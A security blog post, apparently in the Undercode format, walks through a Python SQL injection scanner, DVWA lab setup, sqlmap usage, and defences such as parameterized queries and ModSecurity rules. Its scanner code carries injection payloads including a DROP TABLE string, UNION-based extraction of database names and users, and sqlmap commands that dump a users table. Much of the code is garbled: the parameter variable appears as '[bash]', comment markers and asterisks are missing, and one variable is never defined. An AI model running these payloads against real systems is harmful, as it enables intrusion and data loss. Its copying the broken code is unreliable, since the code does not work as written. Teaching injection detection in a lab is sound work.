Listen to this Post

Introduction
SQL injection remains one of the most critical and persistent web application vulnerabilities, consistently ranking in the OWASP Top 10. Understanding how these attacks work—and how to detect them—is essential for any cybersecurity professional. This article explores a practical Python-based SQL injection scanner project, demonstrating how automated tools can identify vulnerable input points through crafted payloads, concurrency handling, and ethical testing methodologies in controlled environments like DVWA.
Learning Objectives
- Understand the mechanics of SQL injection attacks and how automated scanners detect them
- Learn to build a Python scanner with request handling, payload delivery, and response analysis
- Implement concurrency and rate-limiting for efficient and responsible vulnerability scanning
- Master ethical testing practices using local lab environments like DVWA
- Explore mitigation strategies and secure coding practices to prevent SQL injection
You Should Know
1. Understanding the SQL Injection Scanner Architecture
The Python-based scanner developed by Ziyan Lakhani represents a practical implementation of web vulnerability testing tools. At its core, the scanner works by sending specially crafted HTTP requests to web application inputs and analyzing responses for indicators of SQL injection vulnerabilities.
Key components of the scanner include:
- Payload generation: A collection of SQL injection strings designed to trigger database errors or behavioral changes
- Request engine: Handles HTTP communications with target applications
- Response analyzer: Examines server responses for error messages, timing differences, or content variations
- Concurrency manager: Controls simultaneous scan operations to balance speed and server load
- Logger: Records findings with severity levels and request details
Basic scanner structure in Python:
import requests
import threading
from queue import Queue
import time
import re
class SQLiScanner:
def <strong>init</strong>(self, target_url, params, threads=5, delay=1):
self.target_url = target_url
self.params = params
self.threads = threads
self.delay = delay
self.payloads = [
"'",
"' OR '1'='1",
"' OR '1'='1' --",
"' UNION SELECT NULL--",
"'; DROP TABLE users--",
"' AND SLEEP(5)--",
"' WAITFOR DELAY '00:00:05'--"
]
self.vulnerabilities = []
self.queue = Queue()
def load_payloads(self):
for payload in self.payloads:
self.queue.put(payload)
def test_payload(self, payload):
test_params = self.params.copy()
for param in test_params:
test_params[bash] = payload
try:
start_time = time.time()
response = requests.get(self.target_url, params=test_params, timeout=10)
response_time = time.time() - start_time
Check for SQL error indicators
if self.detect_sql_error(response.text):
self.vulnerabilities.append({
'parameter': param,
'payload': payload,
'type': 'Error-based SQLi',
'time': response_time
})
Check for time-based blind injection
if response_time > 4.5 and ('SLEEP' in payload or 'WAITFOR' in payload):
self.vulnerabilities.append({
'parameter': param,
'payload': payload,
'type': 'Time-based Blind SQLi',
'time': response_time
})
except Exception as e:
print(f"Error testing {param} with {payload}: {e}")
time.sleep(self.delay)
def detect_sql_error(self, response_text):
error_patterns = [
"SQL syntax",
"mysql_fetch",
"ORA-[0-9]",
"PostgreSQL",
"SQLite",
"unclosed quotation mark",
"Microsoft OLE DB",
"Incorrect syntax near"
]
for pattern in error_patterns:
if re.search(pattern, response_text, re.IGNORECASE):
return True
return False
def run_scan(self):
self.load_payloads()
threads = []
for _ in range(self.threads):
t = threading.Thread(target=self.worker)
t.start()
threads.append(t)
for t in threads:
t.join()
return self.vulnerabilities
def worker(self):
while not self.queue.empty():
payload = self.queue.get()
self.test_payload(payload)
self.queue.task_done()
Usage example for DVWA
scanner = SQLiScanner(
target_url="http://localhost/dvwa/vulnerabilities/sqli/",
params={"id": "1", "Submit": "Submit"},
threads=3,
delay=0.5
)
results = scanner.run_scan()
for vuln in results:
print(f"Vulnerability found: {vuln}")
2. Setting Up Your Ethical Testing Environment
Before running any security tools, you must establish a controlled testing environment. The Damn Vulnerable Web Application (DVWA) provides an ideal platform for practicing SQL injection detection without legal or ethical concerns.
Installing DVWA on Linux (Ubuntu/Debian):
Update system and install prerequisites sudo apt update sudo apt install apache2 mysql-server php php-mysqli php-gd libapache2-mod-php git -y Start services sudo systemctl start apache2 sudo systemctl start mysql Download DVWA cd /var/www/html sudo git clone https://github.com/digininja/DVWA.git sudo chown -R www-data:www-data DVWA/ Configure DVWA cd DVWA/config sudo cp config.inc.php.dist config.inc.php sudo nano config.inc.php Set database password Set up database sudo mysql -u root -p CREATE DATABASE dvwa; CREATE USER 'dvwa'@'localhost' IDENTIFIED BY 'p@ssw0rd'; GRANT ALL PRIVILEGES ON dvwa. TO 'dvwa'@'localhost'; FLUSH PRIVILEGES; EXIT;
Installing DVWA on Windows (using XAMPP):
Download and install XAMPP from https://www.apachefriends.org/ Start Apache and MySQL from XAMPP Control Panel Navigate to htdocs cd C:\xampp\htdocs Clone DVWA (requires Git for Windows) git clone https://github.com/digininja/DVWA.git Copy configuration file copy C:\xampp\htdocs\DVWA\config\config.inc.php.dist C:\xampp\htdocs\DVWA\config\config.inc.php Edit config file to set database credentials notepad C:\xampp\htdocs\DVWA\config\config.inc.php Access DVWA at http://localhost/DVWA/setup.php Click "Create/Reset Database" and log in with admin/password
Docker alternative for quick setup:
Run DVWA in Docker container docker run --rm -it -p 80:80 vulnerables/web-dvwa Access at http://localhost
3. Advanced SQL Injection Detection Techniques
Modern SQL injection scanners must evolve beyond simple error-based detection. Understanding different injection types helps build more comprehensive testing tools.
Boolean-based blind injection testing:
def test_boolean_blind(self, base_param, true_payload, false_payload):
"""Test for boolean-based blind SQL injection"""
Send request with condition expected to be true
true_params = self.params.copy()
true_params[bash] = f"1' AND 1=1 {true_payload}"
true_response = requests.get(self.target_url, params=true_params)
true_content = true_response.text
Send request with condition expected to be false
false_params = self.params.copy()
false_params[bash] = f"1' AND 1=2 {false_payload}"
false_response = requests.get(self.target_url, params=false_params)
false_content = false_response.text
If responses differ significantly, likely vulnerable
if self.calculate_similarity(true_content, false_content) < 0.8:
return True
return False
def calculate_similarity(self, text1, text2):
"""Simple similarity ratio based on length difference"""
len1, len2 = len(text1), len(text2)
if len1 == 0 and len2 == 0:
return 1.0
return 1.0 - abs(len1 - len2) / max(len1, len2)
Union-based injection extraction:
def extract_data_union(self, vulnerable_param, column_count):
"""Attempt to extract data using UNION-based injection"""
Determine number of columns
for i in range(1, 10):
payload = f"1' ORDER BY {i}-- -"
params = self.params.copy()
params[bash] = payload
response = requests.get(self.target_url, params=params)
if "Unknown column" in response.text or error_detected:
column_count = i - 1
break
Extract database information
if column_count:
union_payload = f"-1' UNION SELECT "
for j in range(column_count):
if j == 0:
union_payload += "database(),"
elif j == column_count - 1:
union_payload += "user()-- -"
else:
union_payload += f"NULL,"
params = self.params.copy()
params[bash] = union_payload
response = requests.get(self.target_url, params=params)
Parse response for extracted data
return self.extract_data_from_response(response.text)
return None
4. Implementing Concurrency and Rate Limiting
Efficient scanning requires balancing speed with responsible resource usage. Python’s threading and queue modules enable concurrent testing while maintaining control over request rates.
Advanced concurrency manager with rate limiting:
import threading
import time
from queue import Queue
from threading import Semaphore
class RateLimiter:
"""Token bucket rate limiter implementation"""
def <strong>init</strong>(self, max_requests_per_second):
self.rate = max_requests_per_second
self.tokens = max_requests_per_second
self.last_refill = time.time()
self.lock = threading.Lock()
def acquire(self):
with self.lock:
now = time.time()
elapsed = now - self.last_refill
self.tokens = min(self.rate, self.tokens + elapsed self.rate)
self.last_refill = now
if self.tokens >= 1:
self.tokens -= 1
return True
else:
wait_time = (1 - self.tokens) / self.rate
time.sleep(wait_time)
self.tokens = 0
return True
class ConcurrentScanner:
def <strong>init</strong>(self, target, payloads, max_threads=10, requests_per_second=5):
self.target = target
self.payloads = payloads
self.max_threads = max_threads
self.rate_limiter = RateLimiter(requests_per_second)
self.results = []
self.results_lock = threading.Lock()
self.active_threads = Semaphore(max_threads)
self.completed = 0
self.total = len(payloads)
def scan_payload(self, payload):
"""Execute scan for a single payload with rate limiting"""
self.rate_limiter.acquire()
try:
Perform the actual request
response = requests.get(
self.target,
params={"id": payload},
timeout=5,
headers={"User-Agent": "SQLi-Scanner/1.0"}
)
Analyze response
result = self.analyze_response(payload, response)
with self.results_lock:
if result["vulnerable"]:
self.results.append(result)
self.completed += 1
print(f"Progress: {self.completed}/{self.total} ({self.completed/self.total100:.1f}%)")
except Exception as e:
with self.results_lock:
self.completed += 1
print(f"Error with payload {payload}: {e}")
finally:
self.active_threads.release()
def run(self):
"""Start concurrent scanning"""
threads = []
for payload in self.payloads:
self.active_threads.acquire()
t = threading.Thread(target=self.scan_payload, args=(payload,))
t.start()
threads.append(t)
Wait for all threads to complete
for t in threads:
t.join()
return self.results
def analyze_response(self, payload, response):
"""Analyze response for vulnerability indicators"""
vulnerable = False
evidence = None
Check for SQL errors
sql_errors = [
"mysql", "sql", "syntax", "ORA-", "PostgreSQL",
"SQLite", "unclosed quotation", "Microsoft"
]
for error in sql_errors:
if error.lower() in response.text.lower():
vulnerable = True
evidence = f"SQL error detected: {error}"
break
Check for behavioral changes
if "SLEEP" in payload and response.elapsed.total_seconds() > 4:
vulnerable = True
evidence = "Time-based injection detected"
return {
"payload": payload,
"vulnerable": vulnerable,
"evidence": evidence,
"status_code": response.status_code,
"response_time": response.elapsed.total_seconds(),
"response_size": len(response.text)
}
5. Manual SQL Injection Testing with SQLmap
While custom scanners are educational, professional penetration testers often use specialized tools like SQLmap for comprehensive assessments. Understanding SQLmap complements your Python scanner knowledge.
Basic SQLmap commands for testing:
Basic GET parameter test sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id" POST parameter test with data sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/" --data="id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id" Enumerate databases sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id" --dbs Enumerate tables from a specific database sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id" -D dvwa --tables Dump table contents sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id" -D dvwa -T users --dump Advanced options with proxy for debugging sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id" --proxy="http://127.0.0.1:8080" --batch
Using SQLmap with request files for complex scenarios:
Capture request in Burp Suite and save to request.txt Then run SQLmap with the request file sqlmap -r request.txt --batch --level=3 --risk=2 For authenticated scans, include cookies sqlmap -u "http://example.com/page.php?id=1" --cookie="PHPSESSID=abc123; security=low"
6. Mitigation Strategies and Secure Coding Practices
Understanding vulnerabilities is only half the battle; knowing how to prevent them is equally crucial. Implementing proper defenses protects applications from SQL injection attacks.
Parameterized queries in various languages:
Python with SQLite (safe)
import sqlite3
def safe_get_user(user_id):
conn = sqlite3.connect('database.db')
cursor = conn.cursor()
Parameterized query prevents injection
cursor.execute("SELECT FROM users WHERE id = ?", (user_id,))
return cursor.fetchone()
Python with MySQL
import mysql.connector
def safe_get_user_mysql(user_id):
conn = mysql.connector.connect(user='root', password='password', host='localhost', database='test')
cursor = conn.cursor()
Parameterized query
cursor.execute("SELECT FROM users WHERE id = %s", (user_id,))
return cursor.fetchone()
<?php
// PHP with MySQLi (safe)
$mysqli = new mysqli("localhost", "user", "password", "database");
$stmt = $mysqli->prepare("SELECT FROM users WHERE id = ?");
$stmt->bind_param("i", $_GET['id']);
$stmt->execute();
$result = $stmt->get_result();
$user = $result->fetch_assoc();
// PHP with PDO (safe)
$pdo = new PDO("mysql:host=localhost;dbname=database", "user", "password");
$stmt = $pdo->prepare("SELECT FROM users WHERE id = :id");
$stmt->execute(['id' => $_GET['id']]);
$user = $stmt->fetch();
?>
// Java with PreparedStatement (safe)
public User getUserById(String userId) {
String sql = "SELECT FROM users WHERE id = ?";
try (Connection conn = dataSource.getConnection();
PreparedStatement pstmt = conn.prepareStatement(sql)) {
pstmt.setString(1, userId);
ResultSet rs = pstmt.executeQuery();
if (rs.next()) {
return mapUser(rs);
}
} catch (SQLException e) {
logger.error("Database error", e);
}
return null;
}
Input validation and sanitization:
import re
def validate_user_input(input_string):
"""Validate and sanitize user input"""
Whitelist approach - only allow alphanumeric and specific characters
if not re.match("^[a-zA-Z0-9_@. -]+$", input_string):
return None
Escape special characters
sanitized = input_string.replace("'", "''").replace("\", "\\")
return sanitized
Implement proper input validation
def process_request(user_input):
validated = validate_user_input(user_input)
if validated is None:
return "Invalid input detected", 400
Proceed with validated input
return process_validated_input(validated)
Web application firewall (WAF) rules with ModSecurity:
ModSecurity rule for SQL injection prevention
SecRule ARGS "@detectSQLi" \
"id:1000,\
phase:2,\
deny,\
status:403,\
msg:'SQL Injection Attack Detected',\
logdata:'%{MATCHED_VAR}',\
severity:'CRITICAL'"
Custom regex pattern for SQL injection detection
SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/ "@rx (?i:(union.+select|select.+from|insert.+into|delete.+from|update.+set|drop.+table|exec.+xp_cmdshell))" \
"id:1001,\
phase:2,\
deny,\
status:403,\
msg:'SQL Injection Pattern Detected'"
7. Cloud and API Security Testing
Modern applications increasingly rely on APIs and cloud services, introducing new vectors for injection attacks. Testing these environments requires additional considerations.
API security testing script:
import requests
import json
from concurrent.futures import ThreadPoolExecutor
class APISecurityTester:
def <strong>init</strong>(self, base_url, api_key=None):
self.base_url = base_url
self.headers = {
'Content-Type': 'application/json',
'User-Agent': 'API-Security-Scanner/1.0'
}
if api_key:
self.headers['Authorization'] = f'Bearer {api_key}'
def test_sqli_in_json(self, endpoint, param_path):
"""Test for SQL injection in JSON API endpoints"""
payloads = [
{"value": "' OR '1'='1", "expected": "sql_error"},
{"value": "1' UNION SELECT FROM users--", "expected": "data_leak"},
{"value": "1'; DROP TABLE users--", "expected": "error"},
{"value": "1' AND SLEEP(5)--", "expected": "delay"}
]
results = []
for payload in payloads:
Construct JSON body with injected payload
json_body = self.build_nested_json(param_path, payload["value"])
try:
start_time = time.time()
response = requests.post(
f"{self.base_url}{endpoint}",
headers=self.headers,
json=json_body,
timeout=10
)
response_time = time.time() - start_time
Analyze response
vulnerable = self.analyze_api_response(
response,
response_time,
payload["expected"]
)
results.append({
"endpoint": endpoint,
"payload": payload["value"],
"vulnerable": vulnerable,
"status_code": response.status_code,
"response_time": response_time
})
except Exception as e:
print(f"Error testing {endpoint}: {e}")
return results
def build_nested_json(self, param_path, value):
"""Build nested JSON from dot notation path (e.g., 'user.profile.id')"""
parts = param_path.split('.')
result = {}
current = result
for i, part in enumerate(parts):
if i == len(parts) - 1:
current[bash] = value
else:
current[bash] = {}
current = current[bash]
return result
def analyze_api_response(self, response, response_time, expected):
"""Analyze API response for vulnerability indicators"""
Check for SQL errors in response
if response.status_code == 500:
if "sql" in response.text.lower() or "database" in response.text.lower():
return True
Check for time-based injection
if expected == "delay" and response_time > 4.5:
return True
Check for data leakage
if response.status_code == 200 and "users" in response.text.lower():
return True
return False
def scan_graphql_endpoint(self, endpoint):
"""Test GraphQL endpoints for injection vulnerabilities"""
graphql_payloads = [
{
"query": "query { user(id: \"1' OR '1'='1\") { name email } }",
"name": "boolean_based"
},
{
"query": "query { user(id: \"1' UNION SELECT FROM users--\") { name email } }",
"name": "union_based"
},
{
"query": "query { __schema { types { name fields { name } } } }",
"name": "introspection"
}
]
for payload in graphql_payloads:
response = requests.post(
f"{self.base_url}{endpoint}",
headers=self.headers,
json=payload
)
if response.status_code == 200:
if "errors" in response.json():
error_msg = response.json()["errors"][bash]["message"]
if "sql" in error_msg.lower() or "database" in error_msg.lower():
print(f"Potential SQLi in GraphQL: {payload['name']}")
What Undercode Say
Key Takeaway 1: Building custom security tools provides invaluable hands-on experience with vulnerability mechanics, but always remember that ethical boundaries and legal permissions must precede any testing activity. The Python SQL injection scanner demonstrates how automated tools work, yet professional assessments should combine custom scripts with established frameworks like SQLmap for comprehensive coverage.
Key Takeaway 2: SQL injection prevention is fundamentally about treating user input as data, not executable code. Parameterized queries, input validation, and principle of least privilege form the foundation of defense. The most sophisticated scanner cannot protect an application that doesn’t implement these basic security controls.
The journey from understanding SQL injection to building detection tools and implementing defenses represents a complete security mindset evolution. This project exemplifies how hands-on development bridges theoretical knowledge with practical application. As web technologies evolve, so too will injection techniques—making continuous learning and adaptation essential skills for security professionals. The Python scanner approach, combined with proper testing environments like DVWA, creates a safe space to explore vulnerabilities before encountering them in production systems. Remember that the goal isn’t just finding flaws, but understanding them deeply enough to build more secure applications from the start.
Prediction
As artificial intelligence and machine learning integrate into web applications, SQL injection attacks will likely evolve to target AI-driven database queries and vector databases. We’ll see the emergence of “AI-assisted injection” where attackers use language models to craft context-aware payloads that bypass traditional WAF rules. Simultaneously, defensive tools will incorporate behavioral analysis and anomaly detection to identify injection attempts based on query patterns rather than signatures. The next generation of SQL injection scanners will need to understand application logic and database schemas to identify complex, multi-stage injection vulnerabilities that current tools miss. Cloud-native applications with serverless databases will require new testing methodologies as traditional connection-based detection becomes obsolete.
▶️ Related Video (82% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Ziyanlakhani Github – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


